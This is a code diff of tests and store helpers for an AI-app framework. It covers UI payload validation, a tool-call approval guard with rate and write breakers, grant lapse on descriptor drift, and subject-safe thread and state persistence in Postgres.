+  it("accepts any drill-tagged payload as a valid UIPayload, contents preserved", () => {
+    const parsed = uiPayloadSchema.parse(drillPayload());
+    expect(parsed.formatVersion).toBe(DRILL_FORMAT);
+    // passthrough: everything past the tag survives untouched.
+    expect(parsed).toEqual(drillPayload());
+    expect((parsed as DrillPayload).blocks).toHaveLength(2);
+  });
+
+  it("validateTree rejects the drill tag as not-its-format with code \"version\"", () => {
+    const result = validateTree(drillPayload());
+    expect(result.ok).toBe(false);
+    if (result.ok) throw new Error("drill payload must not validate as a v1 tree");
+    expect(result.error.code).toBe("version");
+    expect(result.error.message).toContain(VENDO_TREE_FORMAT);
+  });
+
+  it("still validates the v0 tree unchanged", () => {
+    const result = validateTree(v1Tree());
+    expect(result.ok).toBe(true);
+    if (!result.ok) throw new Error(result.error.message);
+    expect(result.tree.formatVersion).toBe(VENDO_TREE_FORMAT);
+    expect(result.tree.root).toBe("root");
+  });
+
+  it("accepts an app document whose tree carries the drill tag, tree untouched", () => {
+    // AppDocument.tree is typed UIPayload — the drill payload assigns with no cast.
+    const tree: UIPayload = drillPayload();
+    const doc: AppDocument = {
+      format: VENDO_APP_FORMAT,
+      id: "app_drill_1",
+      name: "Drill app",
+      tree,
+    };
+
+    const result = validateAppDocument(doc);
+    expect(result.ok).toBe(true);
+    if (!result.ok) throw new Error(`${result.error.code}: ${result.error.message}`);
+    // No tree-shape assumption: the non-tree block list round-trips verbatim.
+    expect(result.app.tree).toEqual(drillPayload());
+  });
+
+  it("does not body-sniff the drill tree: an app-document shape that would fail v1 validation still passes", () => {
+    // This payload has a `root` that names no node and `nodes: []` — a guaranteed
+    // v1 provision failure. Under the tag it is opaque, so the document is valid.
+    const hostileIfSniffed: UIPayload = {
+      formatVersion: DRILL_FORMAT,
+      root: "does-not-exist",
+      nodes: [],
+      blocks: [{ heading: "opaque", body: "past the tag" }],
+    };
+    // Prove the shape WOULD fail if core treated it as a v1 tree...
+    const asTree = validateTree({ ...hostileIfSniffed, formatVersion: VENDO_TREE_FORMAT });
+    expect(asTree.ok).toBe(false);
+
+    // ...yet the drill-tagged document is accepted, because the tag owns the body.
+    const result = validateAppDocument({
+      format: VENDO_APP_FORMAT,
+      id: "app_drill_2",
+      name: "Drill app 2",
+      tree: hostileIfSniffed,
+    });
+    expect(result.ok).toBe(true);
+    if (!result.ok) throw new Error(`${result.error.code}: ${result.error.message}`);
+    expect(result.app.tree).toEqual(hostileIfSniffed);
+  });
+
+  it("still validates an app document carrying the v0 tree (stored-record compatible)", () => {
+    const result = validateAppDocument({
+      format: VENDO_APP_FORMAT,
+      id: "app_v1_1",
+      name: "V1 app",
+      tree: v1Tree(),
+    });
+    expect(result.ok).toBe(true);
+    if (!result.ok) throw new Error(`${result.error.code}: ${result.error.message}`);
+    expect(result.app.tree?.formatVersion).toBe(VENDO_TREE_FORMAT);
+  });
+});

--- a/packages/guard/test/breakers-lifecycle.e2e.test.ts
+++ b/packages/guard/test/breakers-lifecycle.e2e.test.ts
@@ -1,0 +1,191 @@
+import { descriptorHash } from "@vendoai/core";
+import type { ToolDescriptor } from "@vendoai/core";
+import { afterEach, describe, expect, it } from "vitest";
+import { createGuard } from "../src/index.js";
+import { createPGliteStore, type PGliteStore } from "./fixtures/pglite-store.js";
+import { alice, bob, call, context, descriptor, FixtureTools, seedGrant } from "./fixtures/tools.js";
+
+// These exercise the priority behaviours end-to-end through the public surface
+// (guard.bind / approvals / grants / audit) against the real-SQL PGlite mapping,
+// asserting the persisted side effects with raw SQL on the reserved tables. The
+// dependency guard forbids @vendoai/guard from importing @vendoai/store even in
+// tests, so the store here is the routed PGlite fixture — real Postgres SQL over
+// the same reserved-table schema, exposed via `.query()`.
+
+const stores: PGliteStore[] = [];
+
+async function store(): Promise<PGliteStore> {
+  const value = await createPGliteStore();
+  stores.push(value);
+  return value;
+}
+
+afterEach(async () => {
+  await Promise.all(stores.splice(0).map((value) => value.close()));
+});
+
+describe("grant descriptorHash drift → lapse → re-approval (05 §2 step 3, core §5)", () => {
+  it("lapses the minted grant on drift, forces re-approval, and lands both grants in vendo_grants", async () => {
+    const sqlStore = await store();
+    const guard = createGuard({
+      store: sqlStore,
+      policy: { rules: [{ match: { tool: "host_drift" }, action: "ask" }] },
+    });
+    // A risk override changes the canonical descriptor fingerprint — same tool
+    // name, different hash — which is exactly what lapses a grant.
+    const v1: ToolDescriptor = descriptor("write", { name: "host_drift" });
+    const v2: ToolDescriptor = descriptor("destructive", { name: "host_drift" });
+    expect(descriptorHash(v1)).not.toBe(descriptorHash(v2));
+
+    // Round 1: the rule parks the call; approving with `remember` mints a
+    // standing grant bound to v1's hash.
+    const toolsV1 = new FixtureTools([v1]);
+    const boundV1 = guard.bind(toolsV1);
+    const parked1 = await boundV1.execute(call("host_drift", { x: 0 }, "drift_park_1"), context());
+    if (parked1.status !== "pending-approval") throw new Error("expected round-1 park");
+    await guard.approvals.decide(
+      parked1.approvalId,
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      alice,
+    );
+
+    // The minted grant (not the single-use approval) authorizes: a fresh call id
+    // and args can never match the burned approval, so only the standing grant runs it.
+    const granted1 = await boundV1.execute(call("host_drift", { x: 1 }, "drift_grant_1"), context());
+    expect(granted1).toMatchObject({ status: "ok" });
+    expect(toolsV1.executions).toHaveLength(1);
+
+    // The descriptor drifts (write → destructive): the registry now serves v2.
+    const toolsV2 = new FixtureTools([v2]);
+    const boundV2 = guard.bind(toolsV2);
+
+    // The v1 grant no longer matches the drifted hash, so the call parks again.
+    const parked2 = await boundV2.execute(call("host_drift", { x: 2 }, "drift_park_2"), context());
+    expect(parked2).toMatchObject({ status: "pending-approval" });
+    expect(toolsV2.executions).toHaveLength(0);
+    if (parked2.status !== "pending-approval") throw new Error("expected drift re-park");
+
+    // Re-approving mints a second grant bound to v2's hash, which now authorizes.
+    await guard.approvals.decide(
+      parked2.approvalId,
+      { approve: true, remember: { scope: { kind: "tool" }, duration: "standing" } },
+      alice,
+    );
+    const granted2 = await boundV2.execute(call("host_drift", { x: 3 }, "drift_grant_2"), context());
+    expect(granted2).toMatchObject({ status: "ok" });
+    expect(toolsV2.executions).toHaveLength(1);
+
+    // Both grants persist in the public SQL table: same tool, distinct hashes.
+    const rows = await sqlStore.query<{ tool: string; descriptor_hash: string; source: string }>(
+      "SELECT tool, descriptor_hash, source FROM vendo_grants ORDER BY granted_at",
+    );
+    expect(rows.rows).toHaveLength(2);
+    expect(rows.rows.every((row) => row.tool === "host_drift" && row.source === "chat")).toBe(true);
+    expect(new Set(rows.rows.map((row) => row.descriptor_hash))).toEqual(
+      new Set([descriptorHash(v1), descriptorHash(v2)]),
+    );
+  });
+});
+
+describe("deterministic breakers through bind (05 §2)", () => {
+  it("call-rate breaker is per-principal and records decidedBy breaker in vendo_audit", async () => {
+    const sqlStore = await store();
+    const guard = createGuard({ store: sqlStore, breakers: { maxCallsPerMinute: 1 } });
+    const read = descriptor("read");
+    const bound = guard.bind(new FixtureTools());
+
+    // Alice's second call in the window trips the breaker; a would-be run parks.
+    await expect(bound.execute(call(read.name, {}, "alice_1"), context())).resolves.toMatchObject({
+      status: "ok",
+    });
+    await expect(bound.execute(call(read.name, {}, "alice_2"), context())).resolves.toMatchObject({
+      status: "pending-approval",
+    });
+    // Bob's window is independent — his first call still runs.
+    await expect(
+      bound.execute(call(read.name, {}, "bob_1"), context({ principal: bob })),
+    ).resolves.toMatchObject({ status: "ok" });
+
+    const rows = await sqlStore.query<{
+      subject: string;
+      outcome: string | null;
+      decided_by: string | null;
+    }>(
+      `SELECT subject, event->>'outcome' AS outcome, event->>'decidedBy' AS decided_by
+       FROM vendo_audit WHERE kind = 'tool-call' ORDER BY at`,
+    );
+    expect(rows.rows).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          subject: alice.subject,
+          outcome: "pending-approval",
+          decided_by: "breaker",
+        }),
+        expect.objectContaining({ subject: bob.subject, outcome: "ok", decided_by: "default" }),
+      ]),
+    );
+    // Alice tripped exactly once; her first call and bob's ran clean.
+    const parked = rows.rows.filter((row) => row.outcome === "pending-approval");
+    expect(parked).toHaveLength(1);
+  });
+
+  it("write-per-run breaker parks the over-budget write, ignores reads, and resets per run", async () => {
+    const sqlStore = await store();
+    const guard = createGuard({
+      store: sqlStore,
+      breakers: { maxWritesPerRun: 1, maxCallsPerMinute: 100 },
+    });
+    const bound = guard.bind(new FixtureTools());
+    const run1 = context({ trigger: { runId: "run_e2e_1", kind: "schedule" } });
+    const run2 = context({ trigger: { runId: "run_e2e_2", kind: "schedule" } });
+
+    // A read does not consume the write budget.
+    await expect(bound.execute(call("host_read", {}, "r1"), run1)).resolves.toMatchObject({
+      status: "ok",
+    });
+    // First write fits the budget; the second (21st-style) over-budget write parks.
+    await expect(bound.execute(call("host_write", {}, "w1"), run1)).resolves.toMatchObject({
+      status: "ok",
+    });
+    await expect(bound.execute(call("host_write", {}, "w2"), run1)).resolves.toMatchObject({
+      status: "pending-approval",
+    });
+    // A new run resets the per-run budget.
+    await expect(bound.execute(call("host_write", {}, "w3"), run2)).resolves.toMatchObject({
+      status: "ok",
+    });
+
+    const rows = await sqlStore.query<{ outcome: string | null; decided_by: string | null }>(
+      `SELECT event->>'outcome' AS outcome, event->>'decidedBy' AS decided_by
+       FROM vendo_audit WHERE kind = 'tool-call' AND tool = 'host_write' ORDER BY at`,
+    );
+    const overBudget = rows.rows.find((row) => row.outcome === "pending-approval");
+    expect(overBudget?.decided_by).toBe("breaker");
+    // Exactly one write parked; w1 and w3 ran.
+    expect(rows.rows.filter((row) => row.outcome === "ok")).toHaveLength(2);
+  });
+});
+
+describe("critical tier is unsuppressible (05 §2 step 1, §4)", () => {
+  it("still asks when a matching standing grant, a run rule, and a run judge all agree", async () => {
+    const sqlStore = await store();
+    const criticalDesc = descriptor("read", { name: "host_locked", critical: true });
+    // A grant that would otherwise authorize the exact tool + hash.
+    await seedGrant(sqlStore, { descriptor: criticalDesc });
+    const guard = createGuard({
+      store: sqlStore,
+      policy: { rules: [{ match: {}, action: "run" }] },
+      judge: { decide: async () => ({ action: "run", rationale: "judge says fine" }) },
+    });
+
+    // Critical short-circuits at stage 1: grant, rule, and judge never get to unlock it.
+    await expect(
+      guard.check(call(criticalDesc.name, {}, "crit_check"), criticalDesc, context()),
+    ).resolves.toMatchObject({ action: "ask", decidedBy: "critical" });
+
+    const bound = guard.bind(new FixtureTools([criticalDesc]));
+    await expect(
+      bound.execute(call(criticalDesc.name, {}, "crit_exec"), context()),
+    ).resolves.toMatchObject({ status: "pending-approval" });
+  });
+});

--- a/packages/store/src/ephemeral.test.ts
+++ b/packages/store/src/ephemeral.test.ts
@@ -1,8 +1,8 @@
 import { auditEventSchema, permissionGrantSchema, type Principal } from "@vendoai/core";
 import { afterAll, beforeAll, describe, expect, it } from "vitest";
 import { backends, type MadeBackend } from "./backends.test-util.js";
-import { appFixture, at, auditFixture, grantFixture, persistentPrincipal } from "./fixtures.test-util.js";
-import { appStore, auditStore, createStore, grantStore, stateStore, threadStore } from "./index.js";
+import { appFixture, approvalFixture, at, auditFixture, grantFixture, persistentPrincipal } from "./fixtures.test-util.js";
+import { appStore, approvalStore, auditStore, createStore, grantStore, runStore, stateStore, threadStore } from "./index.js";
 
 for (const backend of backends()) {
   describe(backend.name, () => {
@@ -24,6 +24,19 @@ for (const backend of backends()) {
       await threadStore(made.store).put(ephemeral, { id: "thr_ephemeral", messages: [{ text: "temporary" }] });
       await grantStore(made.store).create(ephemeral, grant);
       await auditStore(made.store).append(event);
+      const approval = approvalFixture("apr_ephemeral", {
+        ctx: { principal: ephemeral, venue: "chat", presence: "present", appId: doc.id },
+      });
+      await approvalStore(made.store).create(approval);
+      // Runs carry no subject column — they inherit ephemerality from their (ephemeral) owning app.
+      await runStore(made.store).put({
+        id: "run_ephemeral",
+        appId: doc.id,
+        trigger: { kind: "schedule" },
+        status: "running",
+        record: { transient: true },
+        startedAt: at(50),
+      });
       const records = made.store.records("app:app_ephemeral:notes");
       await records.put({ id: "note_a", data: { text: "temporary a" }, refs: { kind: "note" } });
       await records.put({ id: "note_b", data: { text: "temporary b" }, refs: { kind: "note" } });
@@ -36,6 +49,8 @@ for (const backend of backends()) {
       expect((await threadStore(made.store).get(ephemeral, "thr_ephemeral"))?.messages).toEqual([{ text: "temporary" }]);
       expect(permissionGrantSchema.parse(await grantStore(made.store).get(grant.id))).toEqual(grant);
       expect(auditEventSchema.parse((await auditStore(made.store).query({ principal: ephemeral })).events[0])).toEqual(event);
+      expect((await approvalStore(made.store).pending(ephemeral)).map((request) => request.id)).toEqual(["apr_ephemeral"]);
+      expect(await runStore(made.store).get("run_ephemeral")).toMatchObject({ appId: doc.id, status: "running" });
       expect((await records.get("note_a"))?.data).toEqual({ text: "temporary a" });
       const fetchedRecord = await records.get("note_a");
       (fetchedRecord?.data as { text: string }).text = "mutated after get";
@@ -72,10 +87,15 @@ for (const backend of backends()) {
     });
 
     it("writes no ephemeral subject rows to any corresponding SQL table", async () => {
-      for (const table of ["vendo_apps", "vendo_state", "vendo_threads", "vendo_grants", "vendo_audit"]) {
+      for (const table of ["vendo_apps", "vendo_state", "vendo_threads", "vendo_grants", "vendo_audit", "vendo_approvals"]) {
         const rows = await made.sql(`SELECT COUNT(*)::int AS count FROM ${table} WHERE subject = $1`, [ephemeral.subject]);
         expect(Number(rows[0]?.count), table).toBe(0);
       }
+      const runs = await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_runs WHERE app_id = $1",
+        ["app_ephemeral"],
+      );
+      expect(Number(runs[0]?.count), "vendo_runs").toBe(0);
       const records = await made.sql(
         "SELECT COUNT(*)::int AS count FROM vendo_records WHERE collection = $1",
         ["app:app_ephemeral:notes"],
@@ -106,6 +126,8 @@ for (const backend of backends()) {
       expect(await threadStore(made.store).get(ephemeral, "thr_ephemeral")).toBeNull();
       expect(await made.store.records("app:app_ephemeral:notes").get("note_a")).toBeNull();
       expect(await made.store.blobs("app:app_ephemeral:files").get("z-last.txt")).toBeNull();
+      expect(await runStore(made.store).get("run_ephemeral")).toBeNull();
+      expect(await approvalStore(made.store).get("apr_ephemeral")).toBeNull();
       expect(await appStore(made.store).get("app_persistent")).not.toBeNull();
       expect(await grantStore(made.store).get("grt_persistent")).not.toBeNull();
     });

--- a/packages/store/src/helpers.test.ts
+++ b/packages/store/src/helpers.test.ts
@@ -84,6 +84,33 @@ for (const backend of backends()) {
       expect((await grants.list(persistentPrincipal)).map((grant) => grant.id)).toEqual([]);
     });
 
+    it("round-trips every grant scope variant plus contextKey and expiresAt 1:1", async () => {
+      const grants = grantStore(made.store);
+      const exact = grantFixture("grt_exact", {
+        scope: { kind: "exact", inputHash: "sha256:abc", inputPreview: "Pay invoice inv_1" },
+        duration: "session",
+        contextKey: "sess_ctx_1",
+        expiresAt: at(59),
+      });
+      const constrained = grantFixture("grt_constrained", {
+        scope: { kind: "constrained", constraints: [{ path: "/amount", op: "lte", value: 100 }] },
+        duration: "task",
+        contextKey: "task_ctx_1",
+      });
+      await grants.create(persistentPrincipal, exact);
+      await grants.create(persistentPrincipal, constrained);
+      // Typed-helper read is byte-for-byte the core shape (scope union, contextKey, expiresAt all preserved).
+      expect(permissionGrantSchema.parse(await grants.get("grt_exact"))).toEqual(exact);
+      expect(permissionGrantSchema.parse(await grants.get("grt_constrained"))).toEqual(constrained);
+      // The same rows read back identically through the routed vendo_grants collection.
+      const routed = made.store.records("vendo_grants");
+      expect(permissionGrantSchema.parse((await routed.get("grt_exact"))?.data)).toEqual(exact);
+      expect(permissionGrantSchema.parse((await routed.get("grt_constrained"))?.data)).toEqual(constrained);
+      // Authoritative columns are derived from the grant, not the caller.
+      expect(await made.sql("SELECT scope, duration, context_key FROM vendo_grants WHERE id = 'grt_exact'"))
+        .toEqual([{ scope: exact.scope, duration: "session", context_key: "sess_ctx_1" }]);
+    });
+
     it("decides only pending approvals, supports batches, and orders pending oldest-first", async () => {
       const approvals = approvalStore(made.store);
       const first = approvalFixture("apr_first", { createdAt: at(1) });

--- a/packages/store/src/helpers/rows.ts
+++ b/packages/store/src/helpers/rows.ts
@@ -1,10 +1,12 @@
-import type {
-  AppDocument,
-  AuditEvent,
-  PermissionGrant,
+import {
+  VendoError,
+  type AppDocument,
+  type AuditEvent,
+  type Json,
+  type PermissionGrant,
 } from "@vendoai/core";
 import type { Db } from "../db.js";
-import type { AppRow, ApprovalRow, RunRow, ThreadRow } from "./types.js";
+import type { AppRow, ApprovalRow, EphemeralStateRow, RunRow, ThreadRow } from "./types.js";
 import { iso, optionalIso, text } from "./utils.js";
 
 export function appFromRow(row: Record<string, unknown>): AppRow {
@@ -49,15 +51,55 @@ export async function putThreadRow(
   input: Pick<ThreadRow, "id" | "subject" | "messages">,
   now = new Date().toISOString(),
 ): Promise<ThreadRow> {
+  // Threads never cross subjects (03 §5). vendo_threads is keyed by the bare id,
+  // so the upsert is guarded ATOMICALLY: on conflict it updates ONLY when the
+  // existing row already belongs to EXCLUDED.subject — otherwise the WHERE fails,
+  // no row is written, RETURNING is empty, and we refuse the cross-subject flip.
+  // This closes the TOCTOU window that a resolve()-time pre-check alone cannot
+  // (a foreign row can appear during a long streaming turn, before persist runs).
   const result = await db.query(
     `INSERT INTO vendo_threads (id, subject, messages, created_at, updated_at)
      VALUES ($1, $2, $3::jsonb, $4, $4)
-     ON CONFLICT (id) DO UPDATE SET subject = EXCLUDED.subject, messages = EXCLUDED.messages,
-       updated_at = EXCLUDED.updated_at
+     ON CONFLICT (id) DO UPDATE SET messages = EXCLUDED.messages, updated_at = EXCLUDED.updated_at
+       WHERE vendo_threads.subject = EXCLUDED.subject
      RETURNING id, subject, messages, created_at, updated_at`,
     [input.id, input.subject, JSON.stringify(input.messages), now],
   );
-  return threadFromRow(result.rows[0] as Record<string, unknown>);
+  const row = result.rows[0];
+  if (row === undefined) {
+    throw new VendoError("conflict", `thread ${input.id} belongs to another subject`);
+  }
+  return threadFromRow(row as Record<string, unknown>);
+}
+
+export function stateRowFromRow(row: Record<string, unknown>): EphemeralStateRow {
+  return {
+    appId: text(row["app_id"]),
+    subject: text(row["subject"]),
+    data: row["data"] as Json,
+    createdAt: iso(row["created_at"]),
+    updatedAt: iso(row["updated_at"]),
+  };
+}
+
+/** The single persistent write path for vendo_state, shared by stateStore.put and
+ *  the routed records("vendo_state").put so the two doors never drift. Writes
+ *  created_at once on insert and PRESERVES it on conflict (only data + updated_at
+ *  change), so the seam's createdAt is stable across puts. Never writes the
+ *  generated `id` column. */
+export async function putStateRow(
+  db: Db,
+  input: { appId: string; subject: string; data: Json },
+  now = new Date().toISOString(),
+): Promise<EphemeralStateRow> {
+  const result = await db.query(
+    `INSERT INTO vendo_state (app_id, subject, data, updated_at, created_at)
+     VALUES ($1, $2, $3::jsonb, $4, $4)
+     ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at
+     RETURNING app_id, subject, data, created_at, updated_at`,
+    [input.appId, input.subject, JSON.stringify(input.data), now],
+  );
+  return stateRowFromRow(result.rows[0] as Record<string, unknown>);
 }
 
 export function grantFromRow(row: Record<string, unknown>): PermissionGrant {

--- a/packages/store/src/helpers/state.ts
+++ b/packages/store/src/helpers/state.ts
@@ -26,17 +26,18 @@ export function stateStore(store: VendoStore): {
     },
     async put(principal, appId, data) {
       const parsedData = requireJson(data, "state data");
+      const now = new Date().toISOString();
       if (principal.ephemeral === true) {
         overlay.states.set(
           stateKey(principal.subject, appId),
-          snapshot({ appId, subject: principal.subject, data: parsedData }),
+          snapshot({ appId, subject: principal.subject, data: parsedData, updatedAt: now }),
         );
         return;
       }
       await db.query(
         `INSERT INTO vendo_state (app_id, subject, data, updated_at) VALUES ($1, $2, $3::jsonb, $4)
          ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at`,
-        [appId, principal.subject, JSON.stringify(parsedData), new Date().toISOString()],
+        [appId, principal.subject, JSON.stringify(parsedData), now],
       );
     },
     async delete(principal, appId) {

--- a/packages/store/src/helpers/state.ts
+++ b/packages/store/src/helpers/state.ts
@@ -1,5 +1,6 @@
 import type { AppId, Json, Principal } from "@vendoai/core";
 import { overlayFor, registerEphemeralSubject, snapshot, stateKey } from "../ephemeral.js";
+import { putStateRow } from "./rows.js";
 import { dbFor, type VendoStore } from "../store.js";
 import { requireJson } from "../validate.js";
 
@@ -28,20 +29,30 @@ export function stateStore(store: VendoStore): {
       const parsedData = requireJson(data, "state data");
       const now = new Date().toISOString();
       if (principal.ephemeral === true) {
+        // Register the subject BEFORE the write (02 §4): otherwise a later seam
+        // write for the same ephemeral subject would decide "not ephemeral" and
+        // INSERT this data durably into vendo_state — a disk leak + read split-brain.
+        registerEphemeralSubject(store, principal.subject);
+        const key = stateKey(principal.subject, appId);
+        const prior = overlay.states.get(key);
         overlay.states.set(
-          stateKey(principal.subject, appId),
-          snapshot({ appId, subject: principal.subject, data: parsedData, updatedAt: now }),
+          key,
+          snapshot({
+            appId,
+            subject: principal.subject,
+            data: parsedData,
+            createdAt: prior?.createdAt ?? now,
+            updatedAt: now,
+          }),
         );
         return;
       }
-      await db.query(
-        `INSERT INTO vendo_state (app_id, subject, data, updated_at) VALUES ($1, $2, $3::jsonb, $4)
-         ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at`,
-        [appId, principal.subject, JSON.stringify(parsedData), now],
-      );
+      // Shared write path with the routed seam (helpers/rows putStateRow).
+      await putStateRow(db, { appId, subject: principal.subject, data: parsedData }, now);
     },
     async delete(principal, appId) {
       if (principal.ephemeral === true) {
+        registerEphemeralSubject(store, principal.subject);
         overlay.states.delete(stateKey(principal.subject, appId));
         return;
       }

--- a/packages/store/src/helpers/threads.ts
+++ b/packages/store/src/helpers/threads.ts
@@ -1,4 +1,4 @@
-import type { Json, Principal, ThreadId } from "@vendoai/core";
+import { VendoError, type Json, type Principal, type ThreadId } from "@vendoai/core";
 import { overlayFor, registerEphemeralSubject, snapshot } from "../ephemeral.js";
 import { dbFor, type VendoStore } from "../store.js";
 import type { ThreadRow } from "./types.js";
@@ -22,6 +22,11 @@ export function threadStore(store: VendoStore): {
       if (principal.ephemeral === true) {
         registerEphemeralSubject(store, principal.subject);
         const prior = overlay.threads.get(thread.id);
+        // Threads never cross subjects (03 §5): refuse an overlay id already owned
+        // by another subject, mirroring putThreadRow's guarded SQL upsert.
+        if (prior !== undefined && prior.subject !== parsed.subject) {
+          throw new VendoError("conflict", `thread ${thread.id} belongs to another subject`);
+        }
         const row: ThreadRow = {
           id: thread.id,
           subject: parsed.subject,

--- a/packages/store/src/helpers/types.ts
+++ b/packages/store/src/helpers/types.ts
@@ -56,4 +56,5 @@ export interface EphemeralStateRow {
   appId: AppId;
   subject: string;
   data: Json;
+  updatedAt: IsoDateTime;
 }

--- a/packages/store/src/helpers/types.ts
+++ b/packages/store/src/helpers/types.ts
@@ -56,5 +56,6 @@ export interface EphemeralStateRow {
   appId: AppId;
   subject: string;
   data: Json;
+  createdAt: IsoDateTime;
   updatedAt: IsoDateTime;
 }

--- a/packages/store/src/host-queryability.test.ts
+++ b/packages/store/src/host-queryability.test.ts
@@ -31,6 +31,21 @@ for (const backend of backends()) {
       ]);
     });
 
+    it("plans the refs containment join through the GIN index", async () => {
+      // Enough rows that the planner prefers the index over a seq scan.
+      const bulk = made.store.records("app:app_plan:expenses");
+      for (let index = 0; index < 60; index += 1) {
+        await made.sql("INSERT INTO invoices(id, total) VALUES ($1, $2) ON CONFLICT (id) DO NOTHING", [`plan_inv_${index}`, index]);
+        await bulk.put({ id: `plan_expense_${index}`, data: { n: index }, refs: { invoice_id: `plan_inv_${index}` } });
+      }
+      const plan = (await made.sql(
+        "EXPLAIN SELECT i.id FROM invoices i JOIN vendo_records r ON r.refs @> jsonb_build_object('invoice_id', i.id)",
+      )).map((row) => String(row["QUERY PLAN"])).join("\n");
+      // The exact §2 containment join is a valid plan that reaches vendo_records through its refs GIN index.
+      expect(plan).toMatch(/Index Scan/);
+      expect(plan).toMatch(/refs @> jsonb_build_object\('invoice_id'/);
+    });
+
     it("joins from the vendo side while scoping collection", async () => {
       await made.store.records("app:app_other:expenses").put({
         id: "other_expense",

--- a/packages/store/src/retention.test.ts
+++ b/packages/store/src/retention.test.ts
@@ -1,0 +1,40 @@
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
+import { backends, type MadeBackend } from "./backends.test-util.js";
+import { auditFixture, persistentPrincipal } from "./fixtures.test-util.js";
+import { auditStore } from "./index.js";
+
+// 02-store §4 (Retention): OSS retention is host SQL on the host's own cron —
+// `DELETE FROM vendo_audit WHERE at < ...`. The table map is public precisely so
+// this works, and the helper's query surface must observe the host's deletions.
+for (const backend of backends()) {
+  describe(backend.name, () => {
+    let made: MadeBackend;
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("honors a host DELETE-by-age against vendo_audit through the query surface", async () => {
+      const audit = auditStore(made.store);
+      const old1 = auditFixture("aud_retain_old_1", { at: "2020-01-01T00:00:00.000Z" });
+      const old2 = auditFixture("aud_retain_old_2", { at: "2021-06-15T00:00:00.000Z" });
+      const fresh = auditFixture("aud_retain_fresh", { at: "2026-07-12T00:00:00.000Z" });
+      for (const event of [old1, old2, fresh]) await audit.append(event);
+
+      // Precondition: all three visible through the helper.
+      expect((await audit.query({ principal: persistentPrincipal })).events.map((event) => event.id).sort())
+        .toEqual(["aud_retain_fresh", "aud_retain_old_1", "aud_retain_old_2"]);
+
+      // The documented host retention path: raw SQL on the public table.
+      const raw = made.store.raw() as { query(text: string, params?: unknown[]): Promise<{ rows: unknown[] }> };
+      await raw.query("DELETE FROM vendo_audit WHERE at < $1", ["2025-01-01T00:00:00.000Z"]);
+
+      // The helper's query surface sees exactly the deletion — only the fresh event survives.
+      expect((await audit.query({ principal: persistentPrincipal })).events.map((event) => event.id))
+        .toEqual(["aud_retain_fresh"]);
+      const remaining = await made.sql("SELECT COUNT(*)::int AS count FROM vendo_audit WHERE subject = $1", [persistentPrincipal.subject]);
+      expect(Number(remaining[0]?.count)).toBe(1);
+    });
+  });
+}

--- a/packages/store/src/routing.ts
+++ b/packages/store/src/routing.ts
@@ -9,7 +9,7 @@ import {
   type VendoRecord,
 } from "@vendoai/core";
 import type { Db } from "./db.js";
-import { isEphemeralApp, isEphemeralSubject, overlayFor, registerEphemeralSubject, snapshot } from "./ephemeral.js";
+import { isEphemeralApp, isEphemeralSubject, overlayFor, registerEphemeralSubject, snapshot, stateKey } from "./ephemeral.js";
 import {
   appFromRow,
   approvalFromRow,
@@ -23,8 +23,8 @@ import {
   runFromRow,
   threadFromRow,
 } from "./helpers/rows.js";
-import type { AppRow, ApprovalRow, RunRow, ThreadRow } from "./helpers/types.js";
-import { decodeCursor, encodeCursor, pageLimit } from "./helpers/utils.js";
+import type { AppRow, ApprovalRow, EphemeralStateRow, RunRow, ThreadRow } from "./helpers/types.js";
+import { decodeCursor, encodeCursor, iso, pageLimit, text } from "./helpers/utils.js";
 import type { VendoStore } from "./store.js";
 import {
   invalid,
@@ -34,6 +34,7 @@ import {
   parsePermissionGrant,
   parseRunData,
   parseThreadData,
+  requireJson,
   requireMatchingId,
   requireRecordId,
   type ApprovalData,
@@ -49,6 +50,7 @@ export const RESERVED_COLLECTIONS = [
   "vendo_threads",
   "vendo_runs",
   "vendo_apps",
+  "vendo_state",
 ] as const;
 
 export type ReservedCollection = typeof RESERVED_COLLECTIONS[number];
@@ -57,6 +59,12 @@ interface RoutedConfig {
   table: ReservedCollection;
   select: string;
   cursorColumn: string;
+  /**
+   * SQL expression that yields a row's record id. Defaults to the `id` column.
+   * `vendo_state` has no id column — its record id is `${app_id}:${subject}`, so it
+   * routes through the reconstructed expression instead.
+   */
+  idColumn?: string;
   refs: Readonly<Record<string, string>>;
   fromDb(row: Record<string, unknown>): VendoRecord;
   overlayRecords(): VendoRecord[];
@@ -145,6 +153,28 @@ function appRecord(row: AppRow): VendoRecord {
   };
 }
 
+function stateRecord(row: EphemeralStateRow): VendoRecord {
+  return {
+    id: `${row.appId}:${row.subject}`,
+    data: row.data,
+    refs: { app_id: row.appId, subject: row.subject },
+    // vendo_state carries only updated_at; state has no distinct creation timestamp.
+    createdAt: row.updatedAt,
+    updatedAt: row.updatedAt,
+  };
+}
+
+/**
+ * apps writes state through `records("vendo_state")` with id `${appId}:${subject}`.
+ * App ids are `app_...` and never contain a colon, so the first colon splits id into
+ * its app_id and subject (subjects may themselves contain colons).
+ */
+function splitStateId(id: string): { appId: string; subject: string } {
+  const colon = id.indexOf(":");
+  if (colon === -1) invalid(`vendo_state record id must be "<appId>:<subject>": ${id}`);
+  return { appId: id.slice(0, colon), subject: id.slice(colon + 1) };
+}
+
 function matchesRecord(record: VendoRecord, query: RecordQuery, cursor?: { c: string; i: string }): boolean {
   if (query.ids !== undefined && !query.ids.includes(record.id)) return false;
   if (query.refs !== undefined) {
@@ -158,12 +188,13 @@ function matchesRecord(record: VendoRecord, query: RecordQuery, cursor?: { c: st
 }
 
 function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
+  const idColumn = config.idColumn ?? "id";
   return {
     async get(id) {
       requireRecordId(id);
       const memory = config.overlayRecords().find((record) => record.id === id);
       if (memory) return memory;
-      const result = await db.query(`${config.select} WHERE id = $1`, [id]);
+      const result = await db.query(`${config.select} WHERE ${idColumn} = $1`, [id]);
       return result.rows[0] ? config.fromDb(result.rows[0]) : null;
     },
     async put(record) {
